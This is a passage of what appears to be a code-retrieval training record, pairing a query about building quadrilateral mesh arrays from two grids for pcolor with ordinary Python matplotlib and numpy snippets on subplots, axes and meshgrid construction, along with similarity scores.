operations consistent\n if d_beg != '' and d_end != '':\n for axx in ax:\n\n dlim = [d_beg,d_end]\n for axxx in axx:\n axxx.set_autoscalex_on(False)\n axxx.set_xlim(dlim)\n\n if ylow != '' and yup != '':\n print(' setting up y scale ',ylow,yup, title)\n for axx in ax:\n\n ylim = [ylow,yup]\n for axxx in axx:\n axxx.set_ylim(ylim) \n\n if maxticks != '':\n for axx in ax:\n for axxx in axx: \n axxx.xaxis.set_major_locator(plt.MaxNLocator(maxticks))\n \n #for a single frame ax is a scalar. put it back.. \n if nbinx==1 and nbiny==1:\n ax = ax[0][0] \n return f,(ax)", "def alty(self, **kwargs):\n if self._alty_child or self._alty_parent:\n raise RuntimeError('No more than *two* twin axes are allowed.')\n with self.figure._authorize_add_subplot():\n ax = self._make_twin_axes(sharex=self, projection='xy')\n ax.set_autoscalex_on(self.get_autoscalex_on())\n ax.grid(False)\n self._alty_child = ax\n ax._alty_parent = self\n self._alty_overrides()\n ax._alty_overrides()\n self.add_child_axes(ax) # to facilitate tight layout\n self.figure._axstack.remove(ax) # or gets drawn twice!\n ax.format(**_parse_alt('y', kwargs))\n return ax", "def _newax(ax=None):\n from matplotlib import pyplot as plt\n if ax is not None:\n return ax\n fig = plt.figure()\n ax = fig.add_subplot(1, 1, 1)\n return ax", "def plots(corpus_parts, corpus):\n \"\"\"\n given the data obtained by the function percentage_hapaxes(dv_corpus, tokenized_corpus),\n the graphic for the percentage of hapaxes per partition is plotted\n \"\"\"\n h_parts = hapaxes_parts(corpus_parts)\n part_size = [x for x in range(len(h_parts))]\n \n percent_h = percentage_hapaxes(corpus_parts, corpus)\n percent_length = [i for i in range(len(percent_h))] \n \n fig, (ax1, ax2) = plt.subplots(1, 2)\n plt.setp(ax1, xticks=np.arange(0, len(part_size), 1))\n plt.setp(ax2, xticks=np.arange(0, len(percent_length), 1))\n fig.suptitle('Number (left) and percentage (right) of hapaxes in each part')\n ax1.bar(part_size, h_parts)\n ax2.bar(percent_length, percent_h) \n return plt.show()", "def plot(self) -> List[matplotlib.figure.Figure]:\n figs = []\n\n title_prefix = self.trial_name + ' ' + self.segment_name + ' '\n # Figure 1, position in 3 subplots\n pos_fig_sub = self.plot_subplots(self.fig_num_start, title_prefix + 'Position (mm)', self.pos_raw,\n self.pos_smooth, self.pos_legend)\n figs.append(pos_fig_sub)\n\n # Figure 2, orientation in 3 subplots\n eul_fig_sub = self.plot_subplots(self.fig_num_start + 1, title_prefix + 'Euler Angles (deg)', self.eul_raw,\n self.eul_smooth, self.euler_legend)\n figs.append(eul_fig_sub)\n\n # Figure 3, velocity in 3 subplots\n vel_fig_sub = self.plot_subplots_vel(self.fig_num_start + 2, title_prefix + 'Velocity', 'Velocity (mm/s)',\n self.vel)\n figs.append(vel_fig_sub)\n\n # Figure 4, angular velocity in 3 subplots\n ang_vel_fig_sub = self.plot_subplots_vel(self.fig_num_start + 3, title_prefix + 'Angular Velocity',\n 'Angular Velocity (deg/s)', self.ang_vel)\n figs.append(ang_vel_fig_sub)\n\n # Figure 5, position in one axes\n pos_fig_one = self.plot_one_axes(self.fig_num_start + 4, title_prefix + 'Position', 'Position (mm)',\n self.pos_raw, self.pos_smooth, self.pos_legend)\n figs.append(pos_fig_one)\n\n # Figure 6, orientation in one axes\n eul_fig_one = self.plot_one_axes(self.fig_num_start + 5, title_prefix + 'Euler Angles', 'Angle (deg)',\n self.eul_raw, self.eul_smooth, self.euler_legend)\n figs.append(eul_fig_one)\n\n # Figure 7, velocity in one axes\n vel_fig_one = self.plot_one_axes_vel(self.fig_num_start + 6, title_prefix + 'Velocity', 'Velocity (mm/s)',\n self.vel, self.pos_legend)\n figs.append(vel_fig_one)\n\n # Figure 8, angular velocity in one axes\n ang_vel_fig_one = self.plot_one_axes_vel(self.fig_num_start + 7, title_prefix + 'Angular Velocity',\n 'Angular Velocity (deg/s)', self.ang_vel, self.pos_legend)\n figs.append(ang_vel_fig_one)\n\n return figs", "def figure7():\n\n plot_settings = {'y_limits': [-100, 30],\n 'x_limits': None,\n 'y_ticks': [-80, -60, -40, -20, 0, 20],\n 'locator_size': 10,\n 'y_label': 'Voltage (mV)',\n 'x_ticks': [],\n 'scale_size': 50,\n 'x_label': \"\",\n 'scale_loc': 3,\n 'figure_name': 'figure_7',\n 'legend': None,\n 'legend_size': 8,\n 'y_on': True}\n\n marker = ['o', 's', '^']\n line_styles = ['-', 'dotted', '--']\n\n plt.figure(figsize=(5, 3), dpi=96)\n\n plt.subplot(2, 1, 1) # Generate subplot 1 (top)\n t, y = solver(250, i_bias_on=2, duration=260)\n plt.plot(t, y[:, 0], 'k-')\n alter_figure(plot_settings)\n\n plt.subplot(2, 1, 2) # Generate subplot 2 (bottom)\n for ix, i_bias_on in enumerate([2, 1.5, 1]):\n t, y = solver(250, i_bias_on=i_bias_on, duration=260)\n t_spike, f = spike_times(t, y[:, 0])\n plt.plot(t_spike[0:-1], f, c='k', linestyle=line_styles[ix], marker=marker[ix], fillstyle='none')\n\n plot_settings['y_limits'] = [20, 40]\n plot_settings['y_ticks'] = [20, 25, 30, 35, 40]\n plot_settings['locator_size'] = 2.5\n plot_settings['y_label'] = 'Frequency (Hz)'\n plot_settings['legend'] = ['2.0 nA', '1.5 nA', '1.0 nA']\n plot_settings['scale_size'] = 0\n plot_settings['legend_location'] = 4\n alter_figure(plot_settings, close=True)", "def createFigure(self):\n\n SMALL_SIZE = 14\n MEDIUM_SIZE = 18\n BIGGER_SIZE = 36\n\n plt.rc('font', size=SMALL_SIZE) # controls default text sizes\n plt.rc('axes', titlesize=SMALL_SIZE) # fontsize of the axes title\n plt.rc('axes', labelsize=MEDIUM_SIZE) # fontsize of the x and y labels\n plt.rc('xtick', labelsize=MEDIUM_SIZE) # fontsize of the tick labels\n plt.rc('ytick', labelsize=MEDIUM_SIZE) # fontsize of the tick labels\n plt.rc('legend', fontsize=SMALL_SIZE) # legend fontsize\n plt.rc('figure', titlesize=BIGGER_SIZE) # fontsize of the figure title\n\n fig, axes = plt.subplots()\n fig.set_size_inches(10, 6, forward=True)\n serialNumber = self.spectrometer.getSerialNumber()\n model = self.spectrometer.model\n fig.canvas.manager.set_window_title('Spectrometer [serial # {0}, model {1}]'.format(serialNumber, model))\n axes.set_xlabel(\"Wavelength [nm]\")\n axes.set_ylabel(\"Intensity [arb.u]\")\n return fig, axes", "def subplot(\r\n self,\r\n data: bool = False,\r\n noise_map: bool = False,\r\n signal_to_noise_map: bool = False,\r\n model_data: bool = False,\r\n residual_map: bool = False,\r\n normalized_residual_map: bool = False,\r\n chi_squared_map: bool = False,\r\n auto_filename: str = \"subplot_fit\",\r\n ):\r\n self._subplot_custom_plot(\r\n data=data,\r\n noise_map=noise_map,\r\n signal_to_noise_map=signal_to_noise_map,\r\n model_image=model_data,\r\n residual_map=residual_map,\r\n normalized_residual_map=normalized_residual_map,\r\n chi_squared_map=chi_squared_map,\r\n auto_labels=AutoLabels(filename=auto_filename),\r\n )", "def change_axes_geometry_stack(fig, ax, naxes):\n for ii in range(len(ax)):\n geometry = (naxes, 1, ii + 1)\n if ax[ii].get_geometry() != geometry:\n ax[ii].change_geometry(*geometry)\n\n for ii in np.arange(len(ax), naxes):\n print('adding axis ', ii)\n fig.add_subplot(naxes, 1, ii + 1)\n\n ax = fig.axes\n return fig, ax", "def makeQuadSubplots(df_rad_obs, \n df_dir_obs, \n df_rad_sen, \n df_dir_sen, \n suptitle='Big title',\n eps=3, \n min_samples=50):\n fig, axs = plt.subplots(2, 2, \n figsize=(10,10)\n )\n\n fig.suptitle('Clustering Output', fontsize=20)\n\n populateSubPlot(df=df_rad_obs,\n eps=eps, \n min_samples=min_samples,\n fig=fig, \n axs=axs, \n row=0, \n col=0, title='Obsever Wards Radiant')\n\n\n populateSubPlot(df=df_dir_obs, \n eps=eps, \n min_samples=min_samples,\n fig=fig, \n axs=axs, \n row=0, \n col=1, title='Obsever Wards Dire')\n\n\n populateSubPlot(df=df_rad_sen, \n eps=eps, \n min_samples=min_samples,\n fig=fig, \n axs=axs, \n row=1, \n col=0, title='Sentry Wards Radiant')\n\n populateSubPlot(df=df_dir_sen, \n eps=eps, \n min_samples=min_samples,\n fig=fig, \n axs=axs, \n row=1, \n col=1, title='Sentry Wards Dire')\n \n \n return fig, axs", "def plot_subplots(x_list, y_list, z_list):\n # create a line chart with the average rating of the top movies per year\n # min rating = 0 and max = 10\n plot1 = plt.subplot(211)\n plt.plot(x_list, y_list, color = 'lightseagreen')\n plt.axis([START_YEAR, END_YEAR - 1, 0, 10])\n plt.title('Average IMDB Movie Rating per Year', fontsize=12)\n plt.ylabel('Average Rating')\n plt.grid(True)\n\n # make x ticklabels of plot1 invisible\n plt.setp(plot1.get_xticklabels(), visible=False)\n\n # adjust space between subplots\n plt.subplots_adjust(hspace=0.3)\n\n # create a line chart with the average runtime with shared x-axis\n plot2 = plt.subplot(212, sharex=plot1)\n plt.plot(x_list, z_list, color = 'lightseagreen')\n plt.title('Average IMDB Movie Runtime per Year', fontsize=12)\n plt.ylabel('Average Runtime (min)')\n plt.grid(True)\n\n # define axes, with all years (2008 till 2017) on the x-axis\n # min runtime = 0, max runtime = 180\n plt.axis([START_YEAR, END_YEAR - 1, 0, 180])\n plt.xticks(x_list)\n plt.xlabel('Year')\n\n # plot both the subplots\n plt.show()", "def _add_new_ax(self, name=None):\n if name in self.ax_names:\n return self.get_ax_by_name(name)\n\n self.ncols += 1\n for i, (ax, ax_name) in enumerate(zip(self.fig.axes, self.ax_names)):\n #print(f'Changing ax {ax_name} geom to: {(1,self.ncols,i+1)}')\n ax.change_geometry(1, self.ncols, i+1)\n\n new_ax = self.fig.add_subplot(1, self.ncols, self.ncols)\n self.ax.append(new_ax)\n self.ax_names.append(name)\n\n return new_ax", "def plot2axes(self, axes: plt.Axes, width: float | int = 1) -> None:\n for idx, line in enumerate(self.marker_lines):\n line.plot2axes(axes, width, color=self.bg_color[idx])", "def add_rotated_axis(f, extents=(-1, 1, 0, 1), sc_x=None, sc_y=None,\n rotation=45, position=(.5, .5, .1, .1),\n invisible_border=True):\n af = Affine2D()\n transform = af.scale(sc_x, sc_y).rotate_deg(rotation)\n helper = floating_axes.GridHelperCurveLinear(transform, extents)\n ax = floating_axes.FloatingSubplot(f, 111, grid_helper=helper)\n ax_aux = ax.get_aux_axes(transform)\n f.add_subplot(ax)\n ax.set_position(position)\n ax.invert_xaxis()\n\n if invisible_border is True:\n # Strip axis elements\n ax.patch.set(visible=False)\n for axis in ax.axis.values():\n axis.set_visible(False)\n\n return ax, ax_aux" ]
[ "0.75483835", "0.69776756", "0.6920952", "0.6792715", "0.6734505", "0.67272097", "0.6658397", "0.65871996", "0.6570815", "0.6514838", "0.64744306", "0.6344331", "0.6338495", "0.6338495", "0.6338495", "0.6302795", "0.6281416", "0.6270343", "0.6264229", "0.62637293", "0.6255154", "0.6236712", "0.62184274", "0.6186897", "0.61654055", "0.6143037", "0.61289173", "0.6124079", "0.60945094", "0.60613894", "0.605767", "0.6055342", "0.60486865", "0.6020366", "0.59955615", "0.5994914", "0.5979007", "0.59462047", "0.59213096", "0.5919712", "0.5917855", "0.5913373", "0.5895629", "0.5894967", "0.5881231", "0.588059", "0.587299", "0.5857417", "0.5850622", "0.5850527", "0.58291614", "0.581591", "0.580388", "0.5802825", "0.579698", "0.5787676", "0.5774288", "0.5760265", "0.5753451", "0.57340515", "0.5731099", "0.5730021", "0.5724319", "0.5720464", "0.5719268", "0.57179874", "0.5714657", "0.5709151", "0.5709151", "0.5700377", "0.56896114", "0.5666812", "0.5653488", "0.5632866", "0.5632866", "0.5632099", "0.5630578", "0.5619918", "0.5619918", "0.5619297", "0.56146", "0.5596572", "0.5580994", "0.55793136", "0.5578921", "0.5556231", "0.5549778", "0.5548228", "0.55460304", "0.5539533", "0.55346483", "0.5524323", "0.552046", "0.55181545", "0.55157137", "0.55113447", "0.5509778", "0.5508655", "0.55072725", "0.5505714" ]
0.6709672
6
Construct quadrilateral mesh arrays from two grids. Intended for use with e.g. plt.pcolor.
def quad_mesh(x, y, cut_x_edges=False, cut_y_edges=False): # Get 1d vertex vectors xvert = get_1d_vertices(x, cut_edges=cut_x_edges) yvert = get_1d_vertices(y, cut_edges=cut_y_edges) # Reshape as multidimensional vectors xvert = reshape_vector(xvert, dim=2, axis=1) yvert = reshape_vector(yvert, dim=2, axis=0) # Broadcast up to arrays xmesh = xvert * np.ones_like(yvert) ymesh = yvert * np.ones_like(xvert) return xmesh, ymesh
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def meshgrid(x,y):\n x = asarray(x)\n y = asarray(y)\n numRows, numCols = len(y), len(x) # yes, reversed\n x = x.reshape(1,numCols)\n X = x.repeat(numRows, axis=0)\n\n y = y.reshape(numRows,1)\n Y = y.repeat(numCols, axis=1)\n return X, Y", "def make_meshgrid(x, y, h=.02):\r\n x_min, x_max = x.min() - 1, x.max() + 1\r\n y_min, y_max = y.min() - 1, y.max() + 1\r\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\r\n np.arange(y_min, y_max, h))\r\n return xx, yy", "def make_meshgrid(x, y,h=0.02):\n x_min, x_max = x.min() - 1, x.max() + 1\n y_min, y_max = y.min() - 1, y.max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n return xx, yy", "def make_meshgrid(x, y, h=.02):\r\n x_min, x_max = x.min() - 1, x.max() + 1\r\n y_min, y_max = y.min() - 1, y.max() + 1\r\n xx, yy = np.meshgrid(np.arange(x_min,x_max,h),np.arange(y_min,y_max,h))\r\n return xx, yy", "def make_meshgrid(x, y, h=.02):\r\n x_min, x_max = x.min() - 1, x.max() + 1\r\n y_min, y_max = y.min() - 1, y.max() + 1\r\n xx, yy = np.meshgrid(np.arange(x_min,x_max,h),np.arange(y_min,y_max,h))\r\n return xx, yy", "def make_meshgrid(x, y, h=.02):\n x_min, x_max = x.min() - 1, x.max() + 1\n y_min, y_max = y.min() - 1, y.max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n return xx, yy", "def make_meshgrid(x, y, h=.02):\n x_min, x_max = x.min() - 1, x.max() + 1\n y_min, y_max = y.min() - 1, y.max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n return xx, yy", "def make_meshgrid(x, y, h=.02):\n x_min, x_max = x.min() - 1, x.max() + 1\n y_min, y_max = y.min() - 1, y.max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n return xx, yy", "def make_meshgrid(x, y, h=.02):\n x_min, x_max = x.min() - 1, x.max() + 1\n y_min, y_max = y.min() - 1, y.max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n return xx, yy", "def make_meshgrid(x, y, h=0.02):\n space = 0.3\n x_min, x_max = x.min() - space, x.max() + space\n y_min, y_max = y.min() - space, y.max() + space\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n return xx, yy", "def make_meshgrid(x, y, h = 5):\n x_min, x_max = x.min() - 1, x.max() + 1\n y_min, y_max = y.min() - 1, y.max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n return xx, yy", "def create_meshgrid(x, y, h=0.015):\n x_min, x_max = x.min() - 1, x.max() + 1\n y_min, y_max = y.min() - 1, y.max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n return xx, yy", "def meshgrid(x, y, row_major=True):\n # type: (int, int, bool)->Tensor\n a = torch.arange(0, x)\n b = torch.arange(0, y)\n xx = a.repeat(y).view(-1, 1).float()\n yy = b.view(-1, 1).repeat(1, x).view(-1, 1).float()\n return torch.cat([xx, yy], 1) if row_major else torch.cat([yy, xx], 1)", "def make_meshgrid(x_min,x_max,y_min,y_max, h=.02):\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n return xx, yy", "def make_meshgrid(x_min,x_max,y_min,y_max, h=.02):\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n return xx, yy", "def grid(h, w, dtype=np.float32):\n M = h * w\n x = np.linspace(0, 1, w, dtype=dtype)\n y = np.linspace(0, 1, h, dtype=dtype)\n xx, yy = np.meshgrid(x, y)\n z = np.empty((M, 2), dtype)\n z[:, 0] = xx.reshape(M)\n z[:, 1] = yy.reshape(M)\n return z", "def make_grid(self, nx, ny):\n nx_vec = np.arange(nx)\n ny_vec = np.arange(ny)\n yv, xv = np.meshgrid(ny_vec, nx_vec)\n grid = np.stack((yv, xv), axis=2)\n grid = grid.reshape(1, 1, ny, nx, 2)\n return grid", "def _create_meshgrid(self):\n x = np.linspace(self.limits[0], self.limits[1], self.resolution)\n y = np.linspace(self.limits[2], self.limits[3], self.resolution)\n X, Y = np.meshgrid(x, y)\n return X, Y", "def coordinate_pairs(lat_axis, lon_axis):\n \n lon_mesh, lat_mesh = numpy.meshgrid(lon_axis, lat_axis) # This is the correct order\n \n return lat_mesh.flatten(), lon_mesh.flatten()", "def meshgrid(b, convention='Driscoll-Healy'):\n return np.meshgrid(*linspace(b, convention))", "def ppcolormesh_from_meshgrid(ax: Axes, x: np.ndarray, y: np.ndarray,\n z: np.ndarray, **kw) -> AxesImage:\n cmap = kw.get('cmap', cm.viridis)\n\n x = x.astype(float)\n y = y.astype(float)\n z = z.astype(float)\n\n # first check if we need to fill some masked values in\n if np.ma.is_masked(x):\n x = x.filled(np.nan)\n if np.ma.is_masked(y):\n y = y.filled(np.nan)\n if np.ma.is_masked(z):\n z = z.filled(np.nan)\n\n # next: try some surgery, if possible\n if np.all(num.is_invalid(x)) or np.all(num.is_invalid(y)):\n return\n if np.any(np.isnan(x)) or np.any(np.isnan(y)):\n x, y = interp_meshgrid_2d(x, y)\n if np.any(num.is_invalid(x)) or np.any(num.is_invalid(y)):\n x, y, z = num.crop2d(x, y, z)\n\n # next, check if the resulting grids are even still plotable\n for g in x, y, z:\n if g.size == 0:\n return\n elif len(g.shape) < 2:\n return\n\n # special case: if we have a single line, a pcolor-type plot won't work.\n elif min(g.shape) < 2:\n im = ax.scatter(x, y, c=z)\n return im\n\n # and finally: the meshgrid we have describes coordinates, but for plotting\n # with pcolormesh we need vertices.\n try:\n x = centers2edges_2d(x)\n y = centers2edges_2d(y)\n except:\n return\n\n im = ax.pcolormesh(x, y, z, cmap=cmap, **kw)\n ax.set_xlim(x.min(), x.max())\n ax.set_ylim(y.min(), y.max())\n return im", "def _grid(m, dtype=np.float32):\n M = m**2\n x = np.linspace(0, 1, m, dtype=dtype)\n y = np.linspace(0, 1, m, dtype=dtype)\n xx, yy = np.meshgrid(x, y)\n z = np.empty((M, 2), dtype)\n z[:, 0] = xx.reshape(M)\n z[:, 1] = yy.reshape(M)\n return z", "def buildGrid(self, plot=False):\r\n\r\n print(\"Constructing grid\")\r\n # print(\"Grid dims\", self.ne, self.nn, self.nz)\r\n # print(\"Num points\", 2*(self.ne+1)*(self.nn+1)*3, len(self.coords))\r\n\r\n # number of edges\r\n self.ndx = self.ne + 1\r\n self.ndy = self.nn + 1\r\n self.ndz = self.nz + 1\r\n\r\n # extract the triplets\r\n self.points = {}\r\n self.points[\"e\"] = self.coords[0::3]\r\n self.points[\"n\"] = self.coords[1::3]\r\n self.points[\"z\"] = self.coords[2::3]\r\n\r\n print('points e')\r\n print(self.points[\"e\"])\r\n\r\n # Here are the coordinates\r\n self.X0 = np.reshape(self.points[\"e\"][0::2] , (self.ndx,self.ndy), order=\"F\")\r\n self.Y0 = np.reshape(self.points[\"n\"][0::2] , (self.ndx,self.ndy), order=\"F\")\r\n self.Z0 = np.reshape(self.points[\"z\"][0::2] , (self.ndx,self.ndy), order=\"F\")\r\n\r\n self.X1 = np.reshape(self.points[\"e\"][1::2] , (self.ndx,self.ndy), order=\"F\")\r\n self.Y1 = np.reshape(self.points[\"n\"][1::2] , (self.ndx,self.ndy), order=\"F\")\r\n self.Z1 = np.reshape(self.points[\"z\"][1::2] , (self.ndx,self.ndy), order=\"F\")\r\n #\r\n # # visualize\r\n # if plot:\r\n # print(\"plotting\")\r\n # fig = plt.figure()\r\n # ax = fig.add_subplot(111, projection='3d')\r\n # ax.plot_wireframe(f2m*self.X0, f2m*self.Y0, f2m*self.Z0, rstride=1, cstride=1)\r\n # ax.plot_wireframe(f2m*self.X1, f2m*self.Y1, f2m*self.Z1, rstride=1, cstride=1)\r\n # plt.show()\r", "def ndgrid(*args,**kwargs):\n kwargs['indexing'] = 'ij'\n return meshgrid(*args,**kwargs)", "def mesh_grid(self,width,height):\n # get\n \n x_linspace=tf.linspace(-self.cx_,1-self.cx_,width)\n y_linspace=tf.linspace(-self.cy_,1-self.cy_,height)\n \n# x_cord,y_cord=tf.meshgrid(x_linspace,y_linspace)\n y_cord,x_cord=tf.meshgrid(y_linspace,x_linspace)\n \n \n x_cord=tf.reshape(x_cord,[-1])\n y_cord=tf.reshape(y_cord,[-1])\n \n f_=tf.ones_like(x_cord)\n \n x_=tf.div(x_cord,self.cf)\n y_=tf.div(y_cord,self.cf)\n \n grid=tf.concat([x_,y_,f_],0)\n return grid", "def create_mesh_grid(val_loc, linspace, frame=None, method='cubic'):\n locations = val_loc[:,0:2]\n values = val_loc[:,2]\n if frame == None:\n frame = create_frame_for(locations)\n assert len(frame) == 2, \"Precondition violation\"\n assert len(frame[0]) == 2 and len(frame[1]) == 2, \"Preconditio violation\"\n assert frame[0][0] <= frame[0][1] and frame[1][0] <= frame[1][1], \"Precondition violation\"\n assert len(linspace) == 2, \"Precondition violatio\"\n assert linspace[0] > 0 and linspace[1] > 0, \"Precondition violation\"\n assert method in ['cubic','linear','nearest'], \"Precondition violaiton\"\n mesh_X, mesh_Y = np.meshgrid(\n np.linspace(frame[0][0],frame[0][1],linspace[0]),\n np.linspace(frame[1][0],frame[1][1],linspace[1]),\n indexing='xy'\n )\n mesh_Z = scipy.interpolate.griddata(\n locations, values, (mesh_X, mesh_Y), method=method, fill_value=0\n )\n return mesh_X, mesh_Y, mesh_Z", "def _setQuadrilaterals(self):\n\n # Make sure arrays are numpy arrays.\n self._lon = np.array(self._lon)\n self._lat = np.array(self._lat)\n self._depth = np.array(self._depth)\n\n # Find the nans, which tells is where the separate polygons/groups are\n group_ends = np.where(np.isnan(self._lon))[0]\n n_groups = len(group_ends)\n\n # Check that arrays are the same length\n if len(self._lon) != len(self._lat) != len(self._depth):\n raise IndexError(\n 'Length of input lon, lat, depth arrays must be equal')\n\n # Construct quads\n group_start = 0\n\n self._quadrilaterals = []\n self._group_index = []\n groupind = 0\n for i in range(n_groups):\n lonseg = self._lon[group_start:group_ends[i]]\n latseg = self._lat[group_start:group_ends[i]]\n depthseg = self._depth[group_start:group_ends[i]]\n\n # Each group can have many contiguous quadrilaterals defined in it\n # separations (nans) between segments mean that segments are not\n # contiguous.\n\n npoints = len(lonseg)\n nquads = int((npoints - 4) / 2) + 1\n quad_start = 0\n quad_end = -1\n for j in range(nquads):\n P0 = Point(lonseg[quad_start],\n latseg[quad_start],\n depthseg[quad_start])\n P1 = Point(lonseg[quad_start + 1],\n latseg[quad_start + 1],\n depthseg[quad_start + 1])\n P2 = Point(lonseg[quad_end - 1],\n latseg[quad_end - 1],\n depthseg[quad_end - 1])\n P3 = Point(lonseg[quad_end],\n latseg[quad_end],\n depthseg[quad_end])\n quad = [P0, P1, P2, P3]\n\n # Enforce plane by moving P2 -- already close because of check\n # in read_rupture_file/is_quadrupture_class/is_quad\n\n dummy, fixed_quad = is_quad(quad)\n\n # Reverse quad if necessary\n fixed_quad = self._fixStrikeDirection(fixed_quad)\n\n self._quadrilaterals.append(fixed_quad)\n\n quad_start = quad_start + 1\n quad_end = quad_end - 1\n\n group_start = group_ends[i] + 1\n self._group_index.extend([groupind] * nquads)\n groupind = groupind + 1", "def grid_coordinates(r, xlim, ylim, shape='square'):\n if shape == 'square':\n dx = r\n dy = r\n if shape == 'hexagonal':\n dx = r\n dy = np.sqrt(3)*dx/2.\n x = np.arange(xlim[0], xlim[1], dx)\n y = np.arange(ylim[0], ylim[1], dy)\n X, Y = np.meshgrid(x, y)\n if shape == 'hexagonal':\n X[::2] = X[::2] + dx/2.\n\n return X.flatten(), Y.flatten()", "def _build_grid(self):\n n = self.params['n']\n\n x_min, x_max = min(self.node[:, 0]), max(self.node[:, 0])\n y_min, y_max = min(self.node[:, 1]), max(self.node[:, 1])\n xv = np.linspace(x_min, x_max, num=n, endpoint=True)\n yv = np.linspace(y_min, y_max, num=n, endpoint=True)\n xg, yg = np.meshgrid(xv, yv, sparse=False, indexing='xy')\n\n return xg, yg", "def get_quad_mesh(q, dx):\n P0, P1, P2, P3 = q\n p0 = Vector.fromPoint(P0) # fromPoint converts to ECEF\n p1 = Vector.fromPoint(P1)\n p2 = Vector.fromPoint(P2)\n p3 = Vector.fromPoint(P3)\n\n # Get nx based on length of top edge, minimum allowed is 2\n toplen_km = get_quad_length(q)\n nx = int(np.max([round(toplen_km / dx, 0) + 1, 2]))\n\n # Get array of points along top and bottom edges\n xfac = np.linspace(0, 1, nx)\n topp = [p0 + (p1 - p0) * a for a in xfac]\n botp = [p3 + (p2 - p3) * a for a in xfac]\n\n # Get ny based on mean length of vectors connecting top and bottom points\n ylen_km = np.ones(nx)\n for i in range(nx):\n ylen_km[i] = (topp[i] - botp[i]).mag() / 1000\n ny = int(np.max([round(np.mean(ylen_km) / dx, 0) + 1, 2]))\n yfac = np.linspace(0, 1, ny)\n\n # Build mesh: dict of ny by nx arrays (x, y, z):\n mesh = {'x': np.zeros([ny, nx]), 'y': np.zeros(\n [ny, nx]), 'z': np.zeros([ny, nx])}\n for i in range(nx):\n mpts = [topp[i] + (botp[i] - topp[i]) * a for a in yfac]\n mesh['x'][:, i] = [a.x for a in mpts]\n mesh['y'][:, i] = [a.y for a in mpts]\n mesh['z'][:, i] = [a.z for a in mpts]\n\n # Make arrays of pixel corners\n mesh['llx'] = mesh['x'][1:, 0:-1]\n mesh['lrx'] = mesh['x'][1:, 1:]\n mesh['ulx'] = mesh['x'][0:-1, 0:-1]\n mesh['urx'] = mesh['x'][0:-1, 1:]\n mesh['lly'] = mesh['y'][1:, 0:-1]\n mesh['lry'] = mesh['y'][1:, 1:]\n mesh['uly'] = mesh['y'][0:-1, 0:-1]\n mesh['ury'] = mesh['y'][0:-1, 1:]\n mesh['llz'] = mesh['z'][1:, 0:-1]\n mesh['lrz'] = mesh['z'][1:, 1:]\n mesh['ulz'] = mesh['z'][0:-1, 0:-1]\n mesh['urz'] = mesh['z'][0:-1, 1:]\n mesh['cpx'] = np.zeros_like(mesh['llx'])\n mesh['cpy'] = np.zeros_like(mesh['llx'])\n mesh['cpz'] = np.zeros_like(mesh['llx'])\n\n # i and j are indices over subruptures\n ni, nj = mesh['llx'].shape\n for i in range(0, ni):\n for j in range(0, nj):\n # Rupture corner points\n pp0 = Vector(\n mesh['ulx'][i, j], mesh['uly'][i, j], mesh['ulz'][i, j])\n pp1 = Vector(\n mesh['urx'][i, j], mesh['ury'][i, j], mesh['urz'][i, j])\n pp2 = Vector(\n mesh['lrx'][i, j], mesh['lry'][i, j], mesh['lrz'][i, j])\n pp3 = Vector(\n mesh['llx'][i, j], mesh['lly'][i, j], mesh['llz'][i, j])\n # Find center of quad\n mp0 = pp0 + (pp1 - pp0) * 0.5\n mp1 = pp3 + (pp2 - pp3) * 0.5\n cp = mp0 + (mp1 - mp0) * 0.5\n mesh['cpx'][i, j] = cp.x\n mesh['cpy'][i, j] = cp.y\n mesh['cpz'][i, j] = cp.z\n return mesh", "def make_xy_grid(samples_x, samples_y=None, radius=1):\n if samples_y is None:\n samples_y = samples_x\n x = e.linspace(-radius, radius, samples_x, dtype=config.precision)\n y = e.linspace(-radius, radius, samples_y, dtype=config.precision)\n xx, yy = e.meshgrid(x, y)\n return xx, yy", "def _TwoDMeshGrid(self, num_points, lattice_sizes, input_dims):\n if input_dims != 2:\n raise ValueError(\"2-d mesh grid is possible only for 2-d lattice. Lattice\"\n \" dimension given: %s\" % input_dims)\n return test_utils.two_dim_mesh_grid(\n num_points=num_points,\n x_min=0.0,\n y_min=0.0,\n x_max=lattice_sizes - 1.0,\n y_max=lattice_sizes - 1.0)", "def create_grids(self):\n \n par = self.par\n\n # a. retirement\n \n # pre-decision states\n par.grid_m_ret = nonlinspace(par.eps,par.m_max_ret,par.Nm_ret,par.phi_m)\n par.Nmcon_ret = par.Nm_ret - par.Na_ret\n \n # post-decision states\n par.grid_a_ret = nonlinspace(0,par.a_max_ret,par.Na_ret,par.phi_m)\n \n # b. working: state space (m,n,k) \n par.grid_m = nonlinspace(par.eps,par.m_max,par.Nm,par.phi_m)\n\n par.Nn = par.Nm\n par.n_max = par.m_max + par.n_add\n par.grid_n = nonlinspace(0,par.n_max,par.Nn,par.phi_n)\n\n par.grid_n_nd, par.grid_m_nd = np.meshgrid(par.grid_n,par.grid_m,indexing='ij')\n\n # c. working: w interpolant (and wa and wb and wq)\n par.Na_pd = np.int_(np.floor(par.pd_fac*par.Nm))\n par.a_max = par.m_max + par.a_add\n par.grid_a_pd = nonlinspace(0,par.a_max,par.Na_pd,par.phi_m)\n \n par.Nb_pd = np.int_(np.floor(par.pd_fac*par.Nn))\n par.b_max = par.n_max + par.b_add\n par.grid_b_pd = nonlinspace(0,par.b_max,par.Nb_pd,par.phi_n)\n \n par.grid_b_pd_nd, par.grid_a_pd_nd = 